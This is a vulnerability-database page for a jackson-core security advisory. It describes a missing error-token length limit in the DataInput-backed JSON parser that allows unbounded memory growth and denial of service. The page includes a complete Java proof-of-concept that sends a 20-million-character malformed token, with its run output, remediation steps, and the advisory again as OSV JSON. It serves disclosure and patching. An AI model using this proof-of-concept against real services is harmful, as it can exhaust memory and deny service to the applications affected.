GHSA-7HHH-6RMP-J9QF

Vulnerability from github – Published: 2026-10-01 15:20 – Updated: 2026-10-01 15:20
VLAI
Summary
jackson-core: UTF8DataInputJsonParser._reportInvalidToken() missing maxErrorTokenLength limit -> unbounded StringBuilder growth (DoS)
Details

Status

FULLY REPRODUCED. A malformed token fed through createParser(DataInput) produced a 20,000,109-character exception message from a 20-million-character attacker payload, while the identical payload fed through createParser(InputStream) produced a correctly bounded 367-character message.

Affected Component / Version

  • Package: com.fasterxml.jackson.core:jackson-core
  • Confirmed against: jackson-core-2.20.2
  • Affected file: src/main/java/com/fasterxml/jackson/core/json/UTF8DataInputJsonParser.java (_reportInvalidToken(int, String, String), lines ~2763-2780 in the 2.20.2 tree)

Technical Analysis

UTF8DataInputJsonParser._reportInvalidToken() builds the offending-token description for its exception message by appending identifier characters one at a time to a bare StringBuilder:

protected void _reportInvalidToken(int ch, String matchedPart, String msg) throws IOException {
    StringBuilder sb = new StringBuilder(matchedPart);
    while (true) {
        char c = (char) _decodeCharForError(ch);
        if (!Character.isJavaIdentifierPart(c)) {
            break;
        }
        sb.append(c);
        ch = _inputData.readUnsignedByte();
    }
    _reportError("Unrecognized token '"+sb.toString()+"': was expecting "+msg);
}

There is no check against ErrorReportConfiguration.getMaxErrorTokenLength() (default 256) anywhere in this loop. By contrast, the sibling UTF8StreamJsonParser implementation of the same logic does enforce it:

// UTF8StreamJsonParser.java (control, correctly bounded)
if (sb.length() >= _ioContext.errorReportConfiguration().getMaxErrorTokenLength()) {
    sb.append("...");
    break;
}

ReaderBasedJsonParser and NonBlockingUtf8JsonParserBase also correctly enforce the limit — this is a defect isolated to the DataInput-backed implementation specifically, confirmed by direct comparison of all four parser implementations in this tree.

This path is additionally left with no fallback control: because of [core#1570]-related logic in JsonFactory, configuring maxDocumentLength causes DataInput-sourced parser creation to be rejected outright, so a document-length backstop cannot coexist with this input source, and the identifier-character accumulation never passes through ReadConstrainedTextBuffer, so maxStringLength does not apply either. There is no configuration an application can set to mitigate this specific path.

Reproduction Procedure

Same clone/build steps as jackson-core_1_...md. Then:

CP="build/classes:build/lib/fastdoubleparser-2.0.1.jar"
javac -cp "$CP" -d poc poc/PoC6_UnboundedErrorTokenStringBuilder.java
java -Xmx2g -cp "poc:$CP" PoC6_UnboundedErrorTokenStringBuilder

Full PoC Source (poc/PoC6_UnboundedErrorTokenStringBuilder.java)

import com.fasterxml.jackson.core.*;

import java.io.DataInputStream;
import java.io.IOException;
import java.io.InputStream;

public class PoC6_UnboundedErrorTokenStringBuilder {

    static class RepeatingByteInputStream extends InputStream {
        private final int b;
        private long remaining;
        RepeatingByteInputStream(int b, long count) { this.b = b; this.remaining = count; }
        @Override public int read() {
            if (remaining <= 0) return -1;
            remaining--;
            return b;
        }
    }

    public static void main(String[] args) throws Exception {
        final long IDENTIFIER_CHAR_COUNT = 20_000_000L;

        System.out.println("Malformed token: \"t\" followed by " + IDENTIFIER_CHAR_COUNT
                + " Java-identifier characters ('x'), then a terminating space, never completing"
                + " \"true\"/\"false\"/\"null\"/NaN.\n");

        System.out.println("=== (a) UTF8DataInputJsonParser via createParser(DataInput) ===");
        {
            InputStream raw = concat3("{\"a\": t".getBytes("UTF-8"),
                    new RepeatingByteInputStream('x', IDENTIFIER_CHAR_COUNT), " }".getBytes("UTF-8"));
            DataInputStream dataIn = new DataInputStream(raw);
            JsonFactory factory = new JsonFactory();
            JsonParser p = factory.createParser((java.io.DataInput) dataIn);

            long heapBefore = usedHeap();
            long t0 = System.nanoTime();
            String message = null;
            try {
                p.nextToken(); p.nextToken(); p.nextToken();
            } catch (JsonParseException e) {
                message = e.getOriginalMessage() != null ? e.getOriginalMessage() : e.getMessage();
            } catch (IOException e) {
                message = "(stream ended: " + e + ")";
            }
            long elapsedMs = (System.nanoTime() - t0) / 1_000_000;
            long heapAfter = usedHeap();

            int msgLen = message == null ? -1 : message.length();
            System.out.println("Exception message length: " + msgLen + " characters");
            System.out.println("Elapsed time: " + elapsedMs + " ms");
            System.out.println("Approx additional heap used: " + ((heapAfter - heapBefore) / (1024 * 1024)) + " MB");
            System.out.println("Message length proportional to the full " + IDENTIFIER_CHAR_COUNT
                    + "-character payload (unbounded)? " + (msgLen > 1_000_000));
        }

        System.out.println("\n=== (b) UTF8StreamJsonParser via createParser(InputStream), SAME malformed input ===");
        {
            InputStream raw = concat3("{\"a\": t".getBytes("UTF-8"),
                    new RepeatingByteInputStream('x', IDENTIFIER_CHAR_COUNT), " }".getBytes("UTF-8"));
            JsonFactory factory = new JsonFactory();
            JsonParser p = factory.createParser(raw);

            long t0 = System.nanoTime();
            String message = null;
            try {
                p.nextToken(); p.nextToken(); p.nextToken();
            } catch (JsonParseException e) {
                message = e.getOriginalMessage() != null ? e.getOriginalMessage() : e.getMessage();
            } catch (IOException e) {
                message = "(stream ended: " + e + ")";
            }
            long elapsedMs = (System.nanoTime() - t0) / 1_000_000;
            int msgLen = message == null ? -1 : message.length();
            System.out.println("Exception message length: " + msgLen + " characters");
            System.out.println("Elapsed time: " + elapsedMs + " ms");
            System.out.println("Message length bounded near default maxErrorTokenLength (256)? " + (msgLen < 500));
        }
    }

    static InputStream concat3(byte[] prefix, InputStream middle, byte[] suffix) {
        InputStream first = new java.io.SequenceInputStream(new java.io.ByteArrayInputStream(prefix), middle);
        return new java.io.SequenceInputStream(first, new java.io.ByteArrayInputStream(suffix));
    }

    static long usedHeap() {
        Runtime rt = Runtime.getRuntime();
        System.gc();
        return rt.totalMemory() - rt.freeMemory();
    }
}

Captured Evidence (actual run output)

Malformed token: "t" followed by 20000000 Java-identifier characters ('x'), then a terminating
space, never completing "true"/"false"/"null"/NaN.

=== (a) UTF8DataInputJsonParser via createParser(DataInput) ===
Exception message length: 20000109 characters
Elapsed time: 81 ms
Approx additional heap used (best-effort, GC-noisy): 38 MB
Message length is proportional to the full 20000000-character attacker payload (unbounded)? true

=== (b) UTF8StreamJsonParser via createParser(InputStream), SAME malformed input ===
Exception message length: 367 characters
Elapsed time: 7 ms
Message length bounded near ErrorReportConfiguration.getMaxErrorTokenLength() (default 256)? true

The same 20-million-character malformed token, fed to the two parser variants, produces a 367-character message via the correctly-bounded InputStream path and a 20,000,109-character message via the vulnerable DataInput path — a difference of roughly 54,500x for identical input, confirming the missing bound is the sole cause of the difference.

Impact

Any application creating parsers via JsonFactory.createParser(DataInput) over attacker-supplied input (a fully public, documented API) is exposed to unbounded memory growth from a single malformed token. Scaling the payload from the 20MB demonstrated here to gigabytes (well within a typical unbounded request body) would drive the accumulated StringBuilder — which additionally undergoes byte-to-char expansion and internal doubling — to consume many times the raw payload size, realistically triggering OutOfMemoryError and denying service to the whole JVM process. Critically, no available configuration mitigates this: maxDocumentLength cannot be set for DataInput sources at all, and maxStringLength does not apply to this code path.

Remediation

  1. Add the maxErrorTokenLength check to the append loop in UTF8DataInputJsonParser._reportInvalidToken(), appending "..." and breaking when the limit is reached — mirroring the three other parser implementations exactly.
  2. Add a parameterized regression test across all four parser implementations asserting the exception message length is bounded by maxErrorTokenLength plus a small constant.
  3. Consider extracting this bounded-scan logic into a single shared helper on ParserMinimalBase to prevent this class of per-implementation drift recurring.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.21.6"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.19.0"
            },
            {
              "fixed": "2.21.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.22.2"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.22.0"
            },
            {
              "fixed": "2.22.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.6"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "tools.jackson.core:jackson-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.2.2"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "tools.jackson.core:jackson-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0"
            },
            {
              "fixed": "3.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.18.10"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.8.0"
            },
            {
              "fixed": "2.18.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-89425"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-01T15:20:27Z",
    "nvd_published_at": "2026-09-23T03:17:04Z",
    "severity": "HIGH"
  },
  "details": "## Status\n\n**FULLY REPRODUCED.** A malformed token fed through `createParser(DataInput)` produced a\n20,000,109-character exception message from a 20-million-character attacker payload, while the\nidentical payload fed through `createParser(InputStream)` produced a correctly bounded\n367-character message.\n\n## Affected Component / Version\n\n- **Package:** `com.fasterxml.jackson.core:jackson-core`\n- **Confirmed against:** `jackson-core-2.20.2`\n- **Affected file:** `src/main/java/com/fasterxml/jackson/core/json/UTF8DataInputJsonParser.java`\n  (`_reportInvalidToken(int, String, String)`, lines ~2763-2780 in the 2.20.2 tree)\n\n## Technical Analysis\n\n`UTF8DataInputJsonParser._reportInvalidToken()` builds the offending-token description for its\nexception message by appending identifier characters one at a time to a bare `StringBuilder`:\n\n```java\nprotected void _reportInvalidToken(int ch, String matchedPart, String msg) throws IOException {\n    StringBuilder sb = new StringBuilder(matchedPart);\n    while (true) {\n        char c = (char) _decodeCharForError(ch);\n        if (!Character.isJavaIdentifierPart(c)) {\n            break;\n        }\n        sb.append(c);\n        ch = _inputData.readUnsignedByte();\n    }\n    _reportError(\"Unrecognized token \u0027\"+sb.toString()+\"\u0027: was expecting \"+msg);\n}\n```\n\nThere is **no check against `ErrorReportConfiguration.getMaxErrorTokenLength()`** (default 256)\nanywhere in this loop. By contrast, the sibling `UTF8StreamJsonParser` implementation of the\nsame logic does enforce it:\n\n```java\n// UTF8StreamJsonParser.java (control, correctly bounded)\nif (sb.length() \u003e= _ioContext.errorReportConfiguration().getMaxErrorTokenLength()) {\n    sb.append(\"...\");\n    break;\n}\n```\n\n`ReaderBasedJsonParser` and `NonBlockingUtf8JsonParserBase` also correctly enforce the limit \u2014\nthis is a defect isolated to the `DataInput`-backed implementation specifically, confirmed by\ndirect comparison of all four parser implementations in this tree.\n\nThis path is additionally left with **no fallback control**: because of `[core#1570]`-related\nlogic in `JsonFactory`, configuring `maxDocumentLength` causes `DataInput`-sourced parser\ncreation to be rejected outright, so a document-length backstop cannot coexist with this input\nsource, and the identifier-character accumulation never passes through\n`ReadConstrainedTextBuffer`, so `maxStringLength` does not apply either. There is no\nconfiguration an application can set to mitigate this specific path.\n\n## Reproduction Procedure\n\nSame clone/build steps as `jackson-core_1_...md`. Then:\n\n```bash\nCP=\"build/classes:build/lib/fastdoubleparser-2.0.1.jar\"\njavac -cp \"$CP\" -d poc poc/PoC6_UnboundedErrorTokenStringBuilder.java\njava -Xmx2g -cp \"poc:$CP\" PoC6_UnboundedErrorTokenStringBuilder\n```\n\n## Full PoC Source (`poc/PoC6_UnboundedErrorTokenStringBuilder.java`)\n\n```java\nimport com.fasterxml.jackson.core.*;\n\nimport java.io.DataInputStream;\nimport java.io.IOException;\nimport java.io.InputStream;\n\npublic class PoC6_UnboundedErrorTokenStringBuilder {\n\n    static class RepeatingByteInputStream extends InputStream {\n        private final int b;\n        private long remaining;\n        RepeatingByteInputStream(int b, long count) { this.b = b; this.remaining = count; }\n        @Override public int read() {\n            if (remaining \u003c= 0) return -1;\n            remaining--;\n            return b;\n        }\n    }\n\n    public static void main(String[] args) throws Exception {\n        final long IDENTIFIER_CHAR_COUNT = 20_000_000L;\n\n        System.out.println(\"Malformed token: \\\"t\\\" followed by \" + IDENTIFIER_CHAR_COUNT\n                + \" Java-identifier characters (\u0027x\u0027), then a terminating space, never completing\"\n                + \" \\\"true\\\"/\\\"false\\\"/\\\"null\\\"/NaN.\\n\");\n\n        System.out.println(\"=== (a) UTF8DataInputJsonParser via createParser(DataInput) ===\");\n        {\n            InputStream raw = concat3(\"{\\\"a\\\": t\".getBytes(\"UTF-8\"),\n                    new RepeatingByteInputStream(\u0027x\u0027, IDENTIFIER_CHAR_COUNT), \" }\".getBytes(\"UTF-8\"));\n            DataInputStream dataIn = new DataInputStream(raw);\n            JsonFactory factory = new JsonFactory();\n            JsonParser p = factory.createParser((java.io.DataInput) dataIn);\n\n            long heapBefore = usedHeap();\n            long t0 = System.nanoTime();\n            String message = null;\n            try {\n                p.nextToken(); p.nextToken(); p.nextToken();\n            } catch (JsonParseException e) {\n                message = e.getOriginalMessage() != null ? e.getOriginalMessage() : e.getMessage();\n            } catch (IOException e) {\n                message = \"(stream ended: \" + e + \")\";\n            }\n            long elapsedMs = (System.nanoTime() - t0) / 1_000_000;\n            long heapAfter = usedHeap();\n\n            int msgLen = message == null ? -1 : message.length();\n            System.out.println(\"Exception message length: \" + msgLen + \" characters\");\n            System.out.println(\"Elapsed time: \" + elapsedMs + \" ms\");\n            System.out.println(\"Approx additional heap used: \" + ((heapAfter - heapBefore) / (1024 * 1024)) + \" MB\");\n            System.out.println(\"Message length proportional to the full \" + IDENTIFIER_CHAR_COUNT\n                    + \"-character payload (unbounded)? \" + (msgLen \u003e 1_000_000));\n        }\n\n        System.out.println(\"\\n=== (b) UTF8StreamJsonParser via createParser(InputStream), SAME malformed input ===\");\n        {\n            InputStream raw = concat3(\"{\\\"a\\\": t\".getBytes(\"UTF-8\"),\n                    new RepeatingByteInputStream(\u0027x\u0027, IDENTIFIER_CHAR_COUNT), \" }\".getBytes(\"UTF-8\"));\n            JsonFactory factory = new JsonFactory();\n            JsonParser p = factory.createParser(raw);\n\n            long t0 = System.nanoTime();\n            String message = null;\n            try {\n                p.nextToken(); p.nextToken(); p.nextToken();\n            } catch (JsonParseException e) {\n                message = e.getOriginalMessage() != null ? e.getOriginalMessage() : e.getMessage();\n            } catch (IOException e) {\n                message = \"(stream ended: \" + e + \")\";\n            }\n            long elapsedMs = (System.nanoTime() - t0) / 1_000_000;\n            int msgLen = message == null ? -1 : message.length();\n            System.out.println(\"Exception message length: \" + msgLen + \" characters\");\n            System.out.println(\"Elapsed time: \" + elapsedMs + \" ms\");\n            System.out.println(\"Message length bounded near default maxErrorTokenLength (256)? \" + (msgLen \u003c 500));\n        }\n    }\n\n    static InputStream concat3(byte[] prefix, InputStream middle, byte[] suffix) {\n        InputStream first = new java.io.SequenceInputStream(new java.io.ByteArrayInputStream(prefix), middle);\n        return new java.io.SequenceInputStream(first, new java.io.ByteArrayInputStream(suffix));\n    }\n\n    static long usedHeap() {\n        Runtime rt = Runtime.getRuntime();\n        System.gc();\n        return rt.totalMemory() - rt.freeMemory();\n    }\n}\n```\n\n## Captured Evidence (actual run output)\n\n```\nMalformed token: \"t\" followed by 20000000 Java-identifier characters (\u0027x\u0027), then a terminating\nspace, never completing \"true\"/\"false\"/\"null\"/NaN.\n\n=== (a) UTF8DataInputJsonParser via createParser(DataInput) ===\nException message length: 20000109 characters\nElapsed time: 81 ms\nApprox additional heap used (best-effort, GC-noisy): 38 MB\nMessage length is proportional to the full 20000000-character attacker payload (unbounded)? true\n\n=== (b) UTF8StreamJsonParser via createParser(InputStream), SAME malformed input ===\nException message length: 367 characters\nElapsed time: 7 ms\nMessage length bounded near ErrorReportConfiguration.getMaxErrorTokenLength() (default 256)? true\n```\n\nThe same 20-million-character malformed token, fed to the two parser variants, produces a\n367-character message via the correctly-bounded `InputStream` path and a 20,000,109-character\nmessage via the vulnerable `DataInput` path \u2014 a difference of roughly 54,500x for identical\ninput, confirming the missing bound is the sole cause of the difference.\n\n## Impact\n\nAny application creating parsers via `JsonFactory.createParser(DataInput)` over\nattacker-supplied input (a fully public, documented API) is exposed to unbounded memory growth\nfrom a single malformed token. Scaling the payload from the 20MB demonstrated here to\ngigabytes (well within a typical unbounded request body) would drive the accumulated\n`StringBuilder` \u2014 which additionally undergoes byte-to-char expansion and internal doubling \u2014\nto consume many times the raw payload size, realistically triggering `OutOfMemoryError` and\ndenying service to the whole JVM process. Critically, **no available configuration mitigates\nthis**: `maxDocumentLength` cannot be set for `DataInput` sources at all, and `maxStringLength`\ndoes not apply to this code path.\n\n## Remediation\n\n1. Add the `maxErrorTokenLength` check to the append loop in\n   `UTF8DataInputJsonParser._reportInvalidToken()`, appending `\"...\"` and breaking when the\n   limit is reached \u2014 mirroring the three other parser implementations exactly.\n2. Add a parameterized regression test across all four parser implementations asserting the\n   exception message length is bounded by `maxErrorTokenLength` plus a small constant.\n3. Consider extracting this bounded-scan logic into a single shared helper on\n   `ParserMinimalBase` to prevent this class of per-implementation drift recurring.",
  "id": "GHSA-7hhh-6rmp-j9qf",
  "modified": "2026-10-01T15:20:27Z",
  "published": "2026-10-01T15:20:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-7hhh-6rmp-j9qf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-89425"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-core/pull/1698"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-core/commit/211cf2c5d91abbec38067f37efc1363cd4e88ee3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FasterXML/jackson-core"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-core/releases/tag/jackson-core-2.18.11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-core/releases/tag/jackson-core-3.2.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "jackson-core: UTF8DataInputJsonParser._reportInvalidToken() missing maxErrorTokenLength limit -\u003e unbounded StringBuilder growth (DoS)"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Loading…

Loading…

Related by attack behaviour

Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.


Loading…